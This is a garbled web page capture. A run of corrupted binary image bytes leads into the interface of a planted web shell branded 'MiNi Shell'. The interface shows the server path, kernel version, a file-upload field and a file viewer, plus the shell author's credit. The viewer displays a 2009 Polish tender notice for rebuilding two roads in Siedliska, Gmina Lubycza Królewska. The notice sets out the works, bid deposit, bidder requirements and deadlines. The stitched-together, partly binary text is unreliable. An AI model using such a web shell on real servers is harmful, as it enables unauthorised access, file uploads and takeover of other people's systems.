JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090811/273504-N-2009.html

<p class="kh_header"><b>Lubycza Królewska: Przebudowa dróg gminnych w miescowości Siedliska - Gmina Lubycza Królewska  
w zakresie :
1.Przebudowa drogi gminnej do cmentarza w miejscowości Siedliska
  od km 0+000,00  do km 0+300,00  - 300 m.b. 
2.Przebudowa drogi gminnej w miejscowości Siedliska 
od km 0+00,00 do km 0+290,00  - 290 m.b.</b><br>
<b>Numer ogłoszenia: 273504 - 2009; data zamieszczenia: 11.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Lubyczy Królewskiej , ul. Kolejowa 1, 22-680 Lubycza Królewska, woj. lubelskie, tel. 084 6617002, 6617462, faks 084 6617412.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> lubycza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych w miescowości Siedliska - Gmina Lubycza Królewska  
w zakresie :
1.Przebudowa drogi gminnej do cmentarza w miejscowości Siedliska
  od km 0+000,00  do km 0+300,00  - 300 m.b. 
2.Przebudowa drogi gminnej w miejscowości Siedliska 
od km 0+00,00 do km 0+290,00  - 290 m.b..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przebudowa drogi gminnej do cmentarza w miejscowości Siedliska
     od km 0+000,00  do km 0+300,00  - 300 m.b. 

Przedmiot zamówienie obejmuje  miedzy innymi :
-	wyznaczenie trasy i punktów wysokościowych na odcinku- 300 m.b. 
-	roboty ziemne 
-	rozebranie i wykonanie części przelotowych - 14,0 m.b.
-	wykonanie  podbudowy z kruszywa łamanego 0-31,5  - 1101,30 m2
-	wykonanie warstwy ścieralnej  z masy mineralno-asfaltowej  - 1101,30 m2

2.	Przebudowa drogi gminnej w miejscowości Siedliska 
od km 0+00,00 do km 0+290,00  - 290 m.b. 

  Przedmiot zamówienie obejmuje  miedzy innymi :
-	wyznaczenie trasy i punktów wysokościowych - 0.290 km 
-	wykonanie koryta na gł. 20 cm z zagęszczeniem  - 870,00 m2
-	wykonanie podbudowy z kruszywa łamanego  - 870,00 m2
-	wykonanie  warstwy ścieralnej z masy mineralno-asfaltowej  - 870,00 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagana wpłata  WADIUM  - w kwocie:  5 000,00 zł 
słownie :pięć tysięcy  złotych groszy 00/100<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O  zamówienie  mogą  ubiegać  się  wykonawcy,  którzy :
a)	spełniają  wymogi  art.  22 ust. 1  prawa  zamówień  publicznych,
b)	nie  są  wykluczeni  na  podstawie  art. 24 ust. 1 i 2  Prawa  zamówień  publicznych,
c)	mają  do  dyspozycji  odpowiednio  wykwalifikowany  personel   posiadający wymagane przez Prawo Budowlane uprawnienia w  danej  specjalności  do obsadzenia niżej wymienionych stanowisk :
-	kierownik budowy
-	majster robót.
d)	posiadają niżej wymieniony sprzęt przewidziany do realizacji zamówienia :
e)	zrealizowali  w  ostatnich  pięciu  latach,  jako  główni  wykonawcy,   min.  3  robót  rodzajowo  porównywalnych  z  przedmiotem  niniejszego  zamówienia,  każda  o  wartości  nie  mniejszej  niż  100  tys.  zł.
f)	udzielą gwarancji na okres co najmniej 36 m-cy - od daty ostatecznego odbioru
i przekazania drogi do użytkowania. 
g)	Zamawiający  dopuszcza  udział  podwykonawców.
Oceny  spełniania  powyższych  warunków  dokona  komisja  przetargowa powołana zarządzeniem wójta Gminy Lubycza Królewska  poprzez analizę formalno-prawną  dokumentów  przedstawionych  przez  Wykonawcę  zgodnie  z  pkt. VI Specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.    Dowód wniesienia Wadium 
2.    Wypełniony  formularz  oferty  podpisany  przez  osobę  uprawnioną. (Zał. nr 1)
3.    Wypełniony  kosztorys  ofertowy  (wg załączonego  wzoru - Zał. nr 2).
4.    Oświadczenie  o  spełnieniu  warunków  udziału  w  postępowaniu  
        na  formularzu  zgodnym  z  załączonym  wzorem  (Zał. nr 3).
5.    Aktualny  odpis  z właściwego  rejestru  albo  aktualne  zaświadczenie  o  wpisie  do ewidencji  działalności  gospodarczej,  jeżeli  odrębne  przepisy  wymagają  wpisu   do rejestru  lub  zgłoszenia  do  ewidencji  działalności  gospodarczej,  wystawione nie wcześniej niż  6  miesięcy  przed  upływem  terminu  składania  ofert. Jeżeli Oferent posiada dokument wystawiony wcześniej niż 6 miesięcy przed upływem terminu składania ofert    oraz zapisy w nim pokrywają się ze stanem rzeczywistym, może  go  załączyć  pod  warunkiem  że  : organ wydający potwierdzi, że dokument jest aktualny, tzn. odpowiada    stanowi rzeczywistemu. Data potwierdzenia nie może być wcześniejsza  niż 6 m-cy  przed upływem terminu składania ofert. 
6.     Zaświadczenia   właściwego   naczelnika   Urzędu   Skarbowego   oraz   właściwego  oddziału   Zakładu   Ubezpieczeń   Społecznych   lub   Kasy   Rolniczego   Ubezpieczenia  Społecznego   potwierdzające,   że  Wykonawca  nie  zalega  z  opłacaniem  podatków,  opłat  oraz  składek  na  ubezpieczenia  zdrowotne,  społeczne,  lub  zaświadczenia,  że  uzyskał  przewidziane  prawem  zwolnienie,  odroczenie  lub  rozłożenie  na  raty  zaległych  płatności,  lub  wstrzymanie  w  całości  wykonania  decyzji  właściwego  organu.  W/w  zaświadczenia  winny  być  wystawione  nie  wcześniej  niż  3  miesiące  przed  upływem  terminu  składania  ofert.
7.     Informację  o  personelu  jakim  dysponuje  Wykonawca  na  formularzu  zgodnym  z  treścią   Załącznika nr 4.   Informacja   musi   potwierdzać   spełnienie   warunku,   o   którym  mowa   w  pkt.  V.1.c  niniejszej  Instrukcji.   Do  informacji   o   personelu   należy  dołączyć  kopie   uprawnień   budowlanych   i   potwierdzenia   przynależności   do   Polskiej   Izby  Inżynierów  Budownictwa.  W  przypadku,  gdy  osoby  wyszczególnione  w  załączniku nr 4  nie  są  etatowymi  pracownikami  Wykonawcy,  należy  dołączyć  do  oferty  (Zobowiązanie  do  współpracy)  zgodne  z  treścią  Załącznika nr 4a. 
8.     Informację  o  jednostkach  sprzętowo-transportowych  wymaganych   do   realizacji  przedmiotu   zamówienia,   jakimi   dysponuje   Wykonawca,   na   formularzu   zgodnym   z  treścią  Załącznika  nr 5.
9.     Informację  o  doświadczeniu    (wykonanych  zamówieniach)    Wykonawcy   na  formularzu  zgodnym  z  treścią  Załącznika  nr  6.  Informacja  musi  potwierdzać  spełnienie  warunku.  o  którym  mowa  w  pkt. V.1.e  niniejszej  instrukcji.    
Do  załącznika  powinny  być  dołączone  dokumenty  potwierdzające,  że  Wykonawca  wymienione  zamówienia  wykonał  z  należytą  starannością.
10.    Wzór  umowy  zaakceptowany  przez  wykonawcę  (Zał. nr 7).

Dokumenty  wymienione  w  pkt. VI  winny  być  załączone  w  formie  oryginału  lub  kopii poświadczonej  za  zgodność  z  oryginałem  przez  osoby  upoważnione  do reprezentowania Wykonawcy  lub  posiadające  pełnomocnictwo.  Pełnomocnictwo  winno  być  dołączone do oferty  o  ile  nie  wynika  z  innych  dokumentów  załączonych  przez  wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lubycza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lubyczy Królewskiej 
ul. Kolejowa 1 
22-680 Lubycza Królewska 
pokój Nr 19 - I -piętro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.09.2009 godzina 10:00, miejsce: Urząd Gminy w Lubyczy Królewskiej 
ul. Kolejowa 1 
22-680 Lubycza Królewska 
pokój Nr 16 - I -piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com